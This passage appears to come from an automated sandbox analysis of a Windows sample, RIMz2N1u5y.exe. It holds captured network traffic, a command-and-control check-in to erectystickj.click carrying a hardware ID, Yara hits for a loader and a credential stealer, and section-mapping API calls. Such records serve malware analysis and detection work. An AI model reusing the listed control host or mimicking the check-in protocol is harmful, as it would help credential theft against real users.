2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 1c 76 54 26 f1 19 21 aa c7 32 32 e4 91 92 b0 89 ef 71 07 33 92 77 57 86 54 74 ec 38 f6 ad 47 f2 0f d2 bc f8 de 9b b0 1b 16 ec 1d 13 fe ce 2d 0a e2 fa 76 74 b7 b2 7d ee 08 1e 6b d6 14 3e b8 3c 52 fc 3c 1c 96 c2 4d 1b 56 d5 9c 4a b2 8b ed 41 98 ce 08 a8 23 a3 ef e2 66 9e 72 c9 a2 57 05 fa a2 04 19 93 d3 bf 64 e1 9e 51 a3 73 9b 50 e0 ee cc 86 f8 ff 6d b2 56 e0 96 5e 9e 1a de 93 5f 03 88 b9 03 aa 1f 10 44 c6 82 83 fe d9 96 5e 6a 2c f9 ed e6 dc 2d 39 d1 ad 8a b7 1a 1c 14 ee fd 9f 33 ea 5b 65 26 5d a8 5b 05 45 cb 51 29 77 4d 41 ea f4 d6 e4 ff ef 55 c4 6c 01 46 81 68 fe 23 04 e0 ad 9c 19 1f 71 19 a5 ef 3f ef a6 b9 02 34 00 1f e4 60 a1 e7 3b 18 6e e2 60 75 ae ba 0a 35 76 5f 64 c0 be 09 03 81 ad fc 25 fb d8 b9 19 c2 bb 2b 2d 98 b0 eb e4 89 db 7a b7 7c 21 5b 14 f1 Data Ascii: vT&!22q3wWTt8G-vt}k><R<MVJA#frWdQsPmV^_D^j,-93[e&][EQ)wMAUlFh#q?4`;n`u5v_d%+-z\|![
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 7f 17 a1 df 4e 13 5d c5 46 4a f2 ab de f9 7b 9f 7c 12 39 39 63 a2 2f f6 4d 30 b9 62 8d 1a 20 fa 1e 60 18 c9 e3 7b 53 7f 86 84 46 7b 64 1d e7 41 9a 58 63 55 46 02 4b fe 50 73 3d 35 5f 61 ec cd e2 70 bb 3e 32 fb 76 fd 41 70 8b f7 1e 91 f1 bd 52 1f 3b d0 66 69 94 81 28 77 e0 df 7d 0c e7 d0 84 0e 37 22 34 5e 49 80 d0 8c 50 ce 32 67 6e 9c 0d a1 7e a9 1d 43 65 88 01 9f 00 3d 10 bd ed dd b0 34 1a 31 3e 84 b4 ee ff 68 8a 32 e9 16 42 a2 cc ac 06 b2 a4 34 0a b0 f6 02 aa 04 7a 0d 2c 48 22 d6 a7 20 fd 0c b0 7f 2d 8e 02 78 e9 e1 59 bb 13 0f 55 6e df fb 02 6c 06 22 e0 80 ab 1d 43 37 06 68 7c e0 e5 42 1b 9a 21 cb 6e 7f 14 3a 5a 72 50 8f 30 81 24 03 88 0b a5 84 32 82 19 b7 37 68 27 49 31 91 55 3e 5f 5a f9 9e eb 7a 8a dd 50 e9 7f e4 6e cd aa e8 53 ba 24 28 f8 f9 59 88 77 Data Ascii: N]FJ{\|99c/M0b `{SF{dAXcUFKPs=5_ap>2vApR;fi(w}7"4^IP2gn~Ce=41>h2B4z,H" -xYUnl"C7h\|B!n:ZrP0$27h'I1U>_ZzPnS$(Yw
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 74 5b 3a 23 93 6f d8 e3 c6 6d 2d ed 71 d9 be f0 69 70 2a 27 4b 3c f8 be df 9a 6f a9 6c 3f 3c 05 78 91 f0 2d cf 98 4e ab b7 be 30 cd bc 8c de 2f 08 91 2c 99 71 7e d1 51 c1 07 fa 5d de c5 25 f2 f8 15 20 bc a3 f2 84 cd 5d 0b 02 98 04 9d 21 30 ec d9 9f ad b7 7b e0 d5 26 a9 5f 63 ab e9 68 f2 7b 41 22 4b a5 99 fd b9 cd 7c 45 74 68 bc ed 73 db 79 8b 4c 2c 2c 34 39 63 d8 ba 90 2d 99 bc e8 48 d1 2f 45 f7 1d 40 b2 4f e1 31 8c fc c9 d1 f2 a8 78 25 87 ef e6 4e b5 fa 75 91 be fc 20 37 f4 e2 57 e7 01 5a 1a a0 18 44 65 64 cd 32 02 d9 b2 dd ea 77 93 c7 fb 2f f3 b2 00 5b 7b 3b 89 42 bc 79 95 04 47 1e 91 9a 11 03 5d f3 da 13 31 8f 69 88 e8 9a b5 7d f3 8c 13 dc f1 2d 61 6d 7e 68 9e f1 9f 13 6b d3 e9 a4 12 eb d3 e2 3a 8d fc 9a 36 d7 96 bd 15 f0 74 84 ec df c0 f9 12 be 4a 87 Data Ascii: t[:#om-qip*'K<ol?<x-N0/,q~Q]% ]!0{&_ch{A"K\|EthsyL,,49c-H/E@O1x%Nu 7WZDed2w/[{;ByG]1i}-am~hk:6tJ
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 10 19 fc 18 01 e9 20 b7 17 c7 a5 17 52 f6 ec 8a 81 75 01 56 8a 08 88 83 34 15 98 27 b0 a1 45 c0 95 5e ff 29 c3 d0 25 75 94 a3 0e 9b 0c c4 13 53 e8 c9 45 46 f6 7c 4f bc c9 7f 0c 46 e1 c0 6a 38 24 fe d1 c1 28 16 46 c1 92 82 5f 3f bb 3d 26 3e a3 a6 7a 1b ff e3 2f d7 c7 e7 1c 1b fa 52 4e fa 87 2a 9d f7 5e bc c5 23 f6 16 ad c4 1b c2 39 43 bd ed 5b c2 a4 0f 91 df be e4 fd 24 04 31 18 50 57 7b d4 8c a0 c9 ef db 45 4d f4 62 43 02 d4 73 d0 21 53 43 a5 ed 2a 0b 9d f1 af c3 b5 89 d9 8d a6 51 a6 0c be 66 9e 35 bd 4f 93 63 a7 a8 cd 65 8d 16 63 69 5d fc 79 74 73 88 82 0a 83 96 06 f1 23 27 4e 7a fa 5d 10 2d c8 50 6b ff b6 4b 6e 25 e7 20 78 bb ff 16 90 b4 7c df 3f e0 a9 07 5e f3 cd fa dc 79 b4 c5 ba f7 05 92 a8 9f 3f 33 2b 07 7b 7c 02 78 b5 fa a0 61 05 db b8 ec ef 9e dc Data Ascii: RuV4'E^)%uSEF\|OFj8$(F_?=&>z/RN^#9C[$1PW{EMbCs!SCQf5Oceci]yts#'Nz]-PkKn% x\|?^y?3+{\|xa
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 98 d1 08 01 cd d2 a6 b2 b6 83 c1 e4 88 5c 2e 3d 26 a2 d2 fc 9f 9c 9c 78 58 44 26 9e 9a ea 81 43 f0 23 e3 d8 35 88 e6 04 51 e7 28 52 23 99 6c f4 21 da f7 38 11 44 06 3c 27 34 10 3e 91 99 00 35 19 bd 25 a2 4e 6e 34 c9 e8 c7 6a 2a e6 64 62 2c 26 b2 cb 39 62 9b 17 27 28 7a dc cb 8a 3a 9c 42 9e 86 5d f9 6a 40 aa 9c 78 b2 c3 fa a4 89 ce 96 d5 49 32 16 d7 5f 06 0e cb 64 d4 10 3e 92 0d 04 e5 16 29 7f c1 29 d4 14 22 de 1c 18 ce b8 d8 6b ae 5f 4e da ea 95 29 3c 8c da 50 a8 bb 57 64 8c 4e 78 1c 1e 54 5c f3 07 c3 28 69 fd 56 72 8e 1e e7 d2 00 2c 81 26 74 6f b4 18 a2 e0 5f 4e a8 08 99 ed 67 cb 56 2e d9 92 70 fe 01 bc 2f db 6e a5 21 98 96 08 7c 1d dd a0 29 a7 fb 30 9e f5 65 30 ce 97 c7 42 20 f7 4c 38 f6 e4 c2 7d b1 95 4f 10 9d b9 d2 94 ad 58 0d f8 b9 32 d9 5b e7 1f ce Data Ascii: \.=&xXD&C#5Q(R#l!8D<'4>5%Nn4j*db,&9b'(z:B]j@xI2_d>))"k_N)<PWdNxT\(iVr,&to_NgV.p/n!\|)0e0B L8}OX2[
2024-12-26 11:08:26 UTC	15331	OUT	Data Raw: 03 d6 6c 4b cf e6 eb 7b 9e c9 83 2b 78 e8 3d 04 57 ed 0d 6f 90 81 f6 f5 ea 00 96 67 1c dd 03 03 a3 d7 b6 1f c5 c0 34 5e d5 c2 77 db 99 4f 32 6e 81 ad 64 fe 87 b0 a5 9f 5e fd eb 9c 41 37 0a f3 ae 83 83 1c c8 98 39 a7 26 00 41 75 b3 17 f2 2e 29 a3 0a bb db 8e 0b ac bc bc 53 d7 1a 03 51 f0 b4 3b eb b7 d1 c2 3b 23 30 25 8f f2 55 4c db e7 51 fb 10 cf c6 6e 21 c5 79 7f 8c 1e f5 93 7f b4 35 9d 42 1d 12 89 15 26 71 7d 0f 6d 96 10 de 3b 10 64 65 bb 0b eb 45 9d fe b5 88 06 1f 04 8e 61 d0 5e 17 a3 af a2 b1 a6 ec 63 4e 0c ea a3 97 59 4e 4c c6 36 6b 57 bd d6 a2 93 1e e8 48 38 79 7f 3f b3 4e 0f 30 e7 28 4c 7b 41 c1 82 db 10 4c 2d 51 84 c2 70 2c fc d9 c0 28 0e 14 9f de 59 7e e0 58 9b 8e 4c bf d6 de 30 ff 58 fd a2 a4 ed c5 0a c0 e6 d8 de 68 2d 9c cf 7d 7e c3 ec 21 08 54 Data Ascii: lK{+x=Wog4^wO2nd^A79&Au.)SQ;;#0%ULQn!y5B&q}m;deEa^cNYNL6kWH8y?N0(L{AL-Qp,(Y~XL0Xh-}~!T
2024-12-26 11:08:28 UTC	1137	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lf7d7t3lhgcp70cfrbklcvkrqf; expires=Mon, 21 Apr 2025 04:55:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w95aiS%2BKI3yp4Gty7kk46PgDpPkMPwb9PavrSgPNZIkvqY8qDLkQx%2BVM0ROkPrJFJOjoVvUsaZ33xw5Fme5FHQ8GVpUwTYQkshjhi93jo3lE4Of0bm70%2FwYj4jYcQSqk8iZWB%2FY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809ceace708ca5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1968&rtt_var=781&sent=372&recv=599&lost=0&retrans=0&sent_bytes=2846&recv_bytes=581425&delivery_rate=1364485&cwnd=237&unsent_bytes=0&cid=68e0cc6a4d041bd5&ts=2860&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49768	172.67.154.166	443	4040	C:\Users\user\Desktop\RIMz2N1u5y.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:08:30 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: erectystickj.click
2024-12-26 11:08:30 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 30 38 38 34 34 31 33 37 38 26 6a 3d 26 68 77 69 64 3d 37 39 30 45 42 42 41 33 46 41 43 44 35 44 31 30 39 35 34 36 45 36 34 41 32 38 44 33 46 44 34 39 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--8088441378&j=&hwid=790EBBA3FACD5D109546E64A28D3FD49
2024-12-26 11:08:31 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:08:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5l7vlj0phn94n8jaop8u8qrn6p; expires=Mon, 21 Apr 2025 04:55:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDrnlvRfI7npKE1falSVsYTivPGB0o7l4B9x7DXk%2BScxR%2FEihvtpKxLktpPXb6oVZWLIS3yK8j8%2BsZzjkCN9FSVyd0CiJ0OeDSo%2BsXqnIT4s%2BTahjVhRyNPiB%2BCcF8T8fDMjEhE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f809d06faab42ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2459&min_rtt=2452&rtt_var=934&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=989&delivery_rate=1162883&cwnd=242&unsent_bytes=0&cid=dbababc556e5df3a&ts=842&x=0"
2024-12-26 11:08:31 UTC	236	IN	Data Raw: 33 36 37 30 0d 0a 6d 66 42 63 52 68 77 46 37 55 78 75 52 75 59 46 38 6a 36 59 7a 77 73 43 73 36 41 31 5a 4c 38 70 64 32 73 2b 6e 73 32 41 76 43 58 43 69 33 34 67 61 43 66 58 66 55 4a 6b 67 79 66 49 44 37 54 74 62 79 43 4a 67 6e 49 7a 2f 46 73 41 43 56 72 76 6f 63 75 46 56 76 43 57 44 68 5a 49 52 6f 51 2f 42 78 36 49 59 4a 46 55 31 2f 78 5a 51 63 48 30 59 52 53 4e 66 7a 34 75 44 74 65 4d 30 50 35 77 31 6f 51 4d 42 47 68 6f 6e 42 6b 63 64 49 39 50 79 33 75 68 67 6b 42 4a 79 75 70 51 41 49 70 51 4f 6c 78 61 32 34 62 30 38 57 72 33 71 67 6b 68 53 46 53 4b 44 56 59 45 69 6d 4b 44 42 74 2f 38 61 6e 4c 67 31 6c 63 74 30 52 6b 6a 57 30 6e 78 76 38 6e 51 45 4b 71 65 46 54 78 6f 4e 62 77 39 58 6e 62 51 59 5a Data Ascii: 3670mfBcRhwF7UxuRuYF8j6YzwsCs6A1ZL8pd2s+ns2AvCXCi34gaCfXfUJkgyfID7TtbyCJgnIz/FsACVrvocuFVvCWDhZIRoQ/Bx6IYJFU1/xZQcH0YRSNfz4uDteM0P5w1oQMBGhonBkcdI9Py3uhgkBJyupQAIpQOlxa24b08Wr3qgkhSFSKDVYEimKDBt/8anLg1lct0RkjW0nxv8nQEKqeFTxoNbw9XnbQYZ
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 35 74 32 66 35 49 51 2f 66 58 63 31 65 48 65 77 31 63 57 50 75 6a 31 2f 5a 72 31 4a 59 4a 41 6e 74 55 67 33 68 61 46 4b 56 78 70 31 58 49 69 55 41 79 67 63 68 35 4f 4a 42 71 52 6a 70 48 35 71 44 69 7a 42 7a 74 6f 52 45 72 64 32 6d 56 4a 67 59 78 73 33 2b 56 55 2f 58 33 51 6c 6a 76 6a 78 34 55 2b 57 55 79 50 47 6a 75 6f 65 66 33 55 64 53 56 62 67 78 4a 59 71 77 64 42 51 50 65 52 73 4a 33 37 2f 6c 71 4d 64 4c 51 5a 68 4c 64 59 42 6c 62 61 71 69 36 37 38 35 55 38 59 6c 76 64 57 74 2f 6d 58 30 2f 4e 39 59 31 78 47 62 30 6e 45 6c 4d 38 4f 46 78 45 2f 68 78 4e 42 6c 4a 2f 4b 6d 32 30 47 36 67 67 7a 55 67 54 6c 57 35 44 77 63 31 69 31 32 63 63 66 75 6c 52 44 48 68 79 55 63 77 37 47 4e 46 50 58 66 62 2f 63 6e 39 64 64 69 57 42 51 31 71 52 35 6c 2b 48 78 4f 55 4e Data Ascii: 5t2f5IQ/fXc1eHew1cWPuj1/Zr1JYJAntUg3haFKVxp1XIiUAygch5OJBqRjpH5qDizBztoRErd2mVJgYxs3+VU/X3Qljvjx4U+WUyPGjuoef3UdSVbgxJYqwdBQPeRsJ37/lqMdLQZhLdYBlbaqi6785U8YlvdWt/mX0/N9Y1xGb0nElM8OFxE/hxNBlJ/Km20G6ggzUgTlW5Dwc1i12ccfulRDHhyUcw7GNFPXfb/cn9ddiWBQ1qR5l+HxOUN
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 2f 4f 7a 54 58 7a 47 59 6d 38 57 6f 32 4c 30 6e 5a 6d 73 50 4f 55 76 75 55 4c 53 70 58 50 4a 34 6c 43 42 53 32 55 62 46 58 36 36 5a 54 62 4e 62 44 58 79 75 4d 65 7a 51 5a 61 73 71 39 73 75 70 73 33 4d 41 56 42 30 78 45 74 78 55 6c 4d 4b 52 78 77 45 2f 4e 76 54 6c 37 2b 5a 6c 77 58 66 4a 69 50 42 4a 30 2b 36 6d 31 78 57 69 75 6c 42 6b 4e 61 45 75 69 49 6a 51 54 67 56 47 6a 57 64 6e 33 53 57 37 55 30 51 30 6a 6a 45 67 48 4f 45 6a 38 68 4f 36 4d 63 61 6d 48 4d 7a 52 56 61 64 68 2f 41 41 2b 63 63 63 4a 76 36 66 38 37 4e 4e 66 4d 5a 69 62 78 61 6a 59 76 53 64 6d 61 77 38 35 53 2b 35 51 74 4b 6c 63 38 6e 69 55 49 46 4c 5a 52 73 56 66 72 70 6c 4e 73 31 73 4e 66 4b 34 78 37 4e 42 6c 71 79 72 32 79 36 6d 7a 63 77 42 55 48 54 45 53 33 46 53 55 77 70 48 48 41 54 38 Data Ascii: /OzTXzGYm8Wo2L0nZmsPOUvuULSpXPJ4lCBS2UbFX66ZTbNbDXyuMezQZasq9sups3MAVB0xEtxUlMKRxwE/NvTl7+ZlwXfJiPBJ0+6m1xWiulBkNaEuiIjQTgVGjWdn3SW7U0Q0jjEgHOEj8hO6McamHMzRVadh/AA+cccJv6f87NNfMZibxajYvSdmaw85S+5QtKlc8niUIFLZRsVfrplNs1sNfK4x7NBlqyr2y6mzcwBUHTES3FSUwpHHAT8
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 67 4a 49 47 50 4e 52 34 42 6c 73 47 72 36 71 79 30 48 4c 57 6c 7a 38 31 52 6c 61 64 64 54 73 57 69 58 4b 58 54 64 4f 35 5a 54 48 58 34 6e 30 72 32 45 67 64 4f 31 54 39 71 74 79 54 46 74 4f 65 4a 69 42 77 56 4a 6b 38 43 79 65 4a 61 34 41 4e 78 4f 42 38 4b 65 62 70 5a 7a 62 32 63 7a 67 48 54 65 71 61 7a 66 41 57 2b 37 4d 6d 64 32 55 38 70 48 6b 43 49 34 35 32 74 77 76 39 68 56 31 45 35 66 6c 59 46 74 6c 34 42 56 4e 31 2b 4a 76 70 79 32 7a 78 75 57 77 74 62 44 4f 4b 65 77 45 4c 71 6e 61 2b 63 66 54 34 58 32 44 45 35 46 4d 73 38 31 73 69 48 6c 48 53 2b 73 4c 56 52 4f 69 2f 45 53 6f 6f 62 6f 63 68 48 69 75 65 66 35 68 70 33 61 35 6e 51 65 66 74 55 68 58 49 57 6b 34 49 55 4f 36 46 37 73 6c 47 38 4b 41 4f 44 33 64 2f 31 42 30 33 44 37 52 4d 74 77 37 52 6a 6c 74 Data Ascii: gJIGPNR4BlsGr6qy0HLWlz81RladdTsWiXKXTdO5ZTHX4n0r2EgdO1T9qtyTFtOeJiBwVJk8CyeJa4ANxOB8KebpZzb2czgHTeqazfAW+7Mmd2U8pHkCI452twv9hV1E5flYFtl4BVN1+Jvpy2zxuWwtbDOKewELqna+cfT4X2DE5FMs81siHlHS+sLVROi/ESoobochHiuef5hp3a5nQeftUhXIWk4IUO6F7slG8KAOD3d/1B03D7RMtw7Rjlt
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 42 58 63 55 42 6b 6b 65 38 62 37 31 76 64 6e 30 36 78 7a 45 32 6c 76 70 43 41 65 4d 36 74 39 6f 45 71 67 39 6a 6b 37 67 38 39 67 4d 4d 59 51 4a 44 39 2f 32 72 72 47 79 45 44 70 67 43 59 4e 62 57 69 55 4f 52 34 76 74 6c 65 69 52 4c 4f 2b 66 6b 44 78 35 6c 31 50 34 77 59 6d 57 31 66 70 76 4c 48 47 63 74 71 67 45 44 45 72 63 6f 6f 32 4b 79 54 52 59 4d 4d 56 79 4c 38 7a 57 75 72 4c 54 78 4c 62 48 68 4d 38 64 4c 58 30 37 76 51 4f 2f 4a 51 71 4d 45 35 43 70 78 59 50 45 59 31 78 74 6b 6d 68 6e 6a 39 6c 69 2b 46 5a 45 6f 68 4f 47 6c 38 4e 2f 35 58 4b 69 6e 32 79 73 6e 64 2b 63 6e 2b 43 4f 31 34 79 31 32 75 37 52 4e 65 6f 62 31 58 6b 78 30 52 52 30 58 4d 47 4a 77 66 43 34 72 6a 73 53 74 2b 64 4c 6a 46 2b 59 37 73 75 4b 41 57 79 59 5a 6c 50 72 62 77 79 5a 75 66 35 Data Ascii: BXcUBkke8b71vdn06xzE2lvpCAeM6t9oEqg9jk7g89gMMYQJD9/2rrGyEDpgCYNbWiUOR4vtleiRLO+fkDx5l1P4wYmW1fpvLHGctqgEDErcoo2KyTRYMMVyL8zWurLTxLbHhM8dLX07vQO/JQqME5CpxYPEY1xtkmhnj9li+FZEohOGl8N/5XKin2ysnd+cn+CO14y12u7RNeob1Xkx0RR0XMGJwfC4rjsSt+dLjF+Y7suKAWyYZlPrbwyZuf5
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 63 74 58 77 62 6f 74 39 79 54 58 37 4b 30 64 79 52 32 5a 49 46 34 52 53 32 4f 59 61 56 61 39 35 55 35 63 39 48 73 62 54 48 46 65 6a 38 69 5a 36 32 41 30 50 70 4f 38 4d 52 73 63 46 49 39 6c 48 55 39 45 71 64 42 68 56 69 7a 6e 31 4d 30 77 66 5a 45 49 39 78 6a 41 6a 63 52 33 34 58 4e 7a 33 33 6a 71 54 4d 44 65 32 43 72 43 6a 59 55 72 32 36 49 42 38 6d 57 51 6c 44 36 35 51 55 74 2f 6e 6b 31 4e 78 47 71 39 4f 62 30 45 61 75 66 42 6e 45 75 4d 74 55 4e 44 51 79 6e 52 34 52 45 2f 59 52 50 59 49 66 75 52 77 44 36 57 43 55 50 66 65 65 41 32 6f 35 56 77 35 5a 6f 41 6a 64 6e 68 79 35 57 64 70 39 30 67 6b 33 43 6c 6b 41 7a 2f 50 52 65 45 39 42 62 50 6a 49 48 32 70 47 76 7a 30 76 79 77 43 67 77 56 7a 32 4a 49 41 67 41 68 33 2f 4c 59 72 66 32 63 54 44 35 6c 46 77 6e 36 Data Ascii: ctXwbot9yTX7K0dyR2ZIF4RS2OYaVa95U5c9HsbTHFej8iZ62A0PpO8MRscFI9lHU9EqdBhVizn1M0wfZEI9xjAjcR34XNz33jqTMDe2CrCjYUr26IB8mWQlD65QUt/nk1NxGq9Ob0EaufBnEuMtUNDQynR4RE/YRPYIfuRwD6WCUPfeeA2o5Vw5ZoAjdnhy5Wdp90gk3ClkAz/PReE9BbPjIH2pGvz0vywCgwVz2JIAgAh3/LYrf2cTD5lFwn6
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 31 35 34 66 49 6a 52 66 51 6c 69 38 49 4e 30 2b 36 48 54 63 6f 6e 6d 65 66 61 71 72 35 54 55 76 65 32 58 6f 74 32 45 38 6c 4c 32 37 56 6a 39 6d 4a 66 2b 36 6b 62 44 46 7a 64 36 51 6e 43 42 36 2f 64 72 4e 4a 71 66 74 6e 57 50 4c 6a 55 79 4c 4b 63 79 63 4a 55 63 76 34 34 76 55 51 32 6f 6b 2b 48 47 31 70 6f 43 41 45 4b 6f 68 48 6f 6d 72 62 70 6e 68 72 31 66 4e 6b 4b 73 30 65 42 7a 6c 4f 32 72 54 55 7a 42 66 50 69 57 77 58 56 45 32 78 59 79 30 6e 69 54 4f 66 63 75 2b 32 53 47 44 30 35 6c 59 68 30 68 30 32 47 6b 2b 76 69 73 48 2f 58 39 32 73 63 78 35 64 59 6f 51 39 50 58 4f 7a 4d 70 31 39 38 72 78 67 52 49 4f 51 66 78 58 5a 48 44 73 35 54 66 6d 55 73 2f 5a 38 72 4b 6f 72 45 69 78 79 67 6a 34 6e 4b 4e 42 4d 6f 41 76 51 75 55 5a 6b 78 2f 52 32 41 39 70 49 48 51 Data Ascii: 154fIjRfQli8IN0+6HTconmefaqr5TUve2Xot2E8lL27Vj9mJf+6kbDFzd6QnCB6/drNJqftnWPLjUyLKcycJUcv44vUQ2ok+HG1poCAEKohHomrbpnhr1fNkKs0eBzlO2rTUzBfPiWwXVE2xYy0niTOfcu+2SGD05lYh0h02Gk+visH/X92scx5dYoQ9PXOzMp198rxgRIOQfxXZHDs5TfmUs/Z8rKorEixygj4nKNBMoAvQuUZkx/R2A9pIHQ
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 79 76 39 6d 37 63 41 52 46 79 68 42 70 44 73 74 43 6f 42 31 68 33 33 7a 6d 55 64 77 38 66 5a 36 43 75 56 2b 41 7a 68 76 78 2f 6a 4a 2f 6b 66 30 74 52 45 42 4c 32 53 46 43 67 4d 66 6b 54 54 46 61 76 4f 34 5a 45 76 53 39 67 59 50 34 77 59 62 57 46 57 76 70 4f 36 4c 46 66 75 6a 47 6a 4a 77 54 36 39 34 4a 79 43 68 55 72 46 4d 72 6f 64 44 63 74 4c 53 44 41 37 38 55 54 55 37 61 74 32 6b 35 4f 6c 54 39 70 34 46 4c 56 74 4d 6c 79 6b 73 4a 34 35 58 78 77 79 6f 67 6c 39 54 69 74 6c 53 43 38 35 4b 52 51 55 4f 7a 37 66 35 32 33 4c 57 70 7a 38 44 4a 55 69 6d 42 78 63 4d 67 6e 62 47 44 4d 69 6b 55 55 37 38 6c 56 45 6d 33 57 73 56 41 30 6a 4b 68 63 6e 55 51 38 4f 71 4f 51 73 6f 66 37 55 38 4f 54 43 45 52 4c 4e 53 37 5a 59 37 61 64 7a 58 42 68 47 4d 52 7a 34 52 62 76 47 Data Ascii: yv9m7cARFyhBpDstCoB1h33zmUdw8fZ6CuV+Azhvx/jJ/kf0tREBL2SFCgMfkTTFavO4ZEvS9gYP4wYbWFWvpO6LFfujGjJwT694JyChUrFMrodDctLSDA78UTU7at2k5OlT9p4FLVtMlyksJ45Xxwyogl9TitlSC85KRQUOz7f523LWpz8DJUimBxcMgnbGDMikUU78lVEm3WsVA0jKhcnUQ8OqOQsof7U8OTCERLNS7ZY7adzXBhGMRz4RbvG
2024-12-26 11:08:31 UTC	1369	IN	Data Raw: 2f 2b 70 45 69 78 65 4d 59 41 39 48 54 53 52 5a 4c 68 45 33 66 64 43 53 66 6a 5a 66 79 4c 62 48 54 41 6d 42 38 79 49 78 34 56 6f 78 64 38 79 49 30 31 69 70 68 30 47 63 74 35 47 67 6c 6e 32 76 45 78 44 30 74 59 65 45 75 63 64 47 69 5a 71 35 34 6a 76 30 57 7a 31 76 32 38 68 66 33 2f 63 43 54 77 67 31 6e 7a 5a 57 75 69 63 53 6e 44 77 36 47 45 54 35 6e 34 7a 50 30 6e 39 69 2f 48 4d 45 36 47 71 4e 53 56 34 56 61 63 50 42 42 61 50 56 36 4a 62 33 70 74 62 52 65 48 69 65 54 44 78 57 55 51 46 64 39 61 59 79 64 35 44 32 35 67 46 43 33 70 48 6c 51 73 66 45 34 55 31 6f 68 57 72 75 30 56 73 35 6f 74 36 49 39 70 49 41 54 74 4d 35 49 44 68 68 45 79 75 70 7a 6f 49 56 33 43 55 64 46 64 2b 69 32 75 4c 53 73 76 2f 62 6d 66 6e 30 51 55 68 2b 6d 78 42 4b 51 37 5a 72 2b 71 49 Data Ascii: /+pEixeMYA9HTSRZLhE3fdCSfjZfyLbHTAmB8yIx4Voxd8yI01iph0Gct5Ggln2vExD0tYeEucdGiZq54jv0Wz1v28hf3/cCTwg1nzZWuicSnDw6GET5n4zP0n9i/HME6GqNSV4VacPBBaPV6Jb3ptbReHieTDxWUQFd9aYyd5D25gFC3pHlQsfE4U1ohWru0Vs5ot6I9pIATtM5IDhhEyupzoIV3CUdFd+i2uLSsv/bmfn0QUh+mxBKQ7Zr+qI

Target ID:	0
Start time:	06:07:58
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\RIMz2N1u5y.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RIMz2N1u5y.exe"
Imagebase:	0x400000
File size:	1'791'344 bytes
MD5 hash:	0AFFFC327A38BDC6812B51507CACDCBE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2441656031.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2338758204.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2117748549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2217044597.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.7%
Total number of Nodes:	128
Total number of Limit Nodes:	13

Executed Functions

Function 008BF884 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 008BF91D
NtMapViewOfSection.NTDLL(?,00000000), ref: 008BF9C5
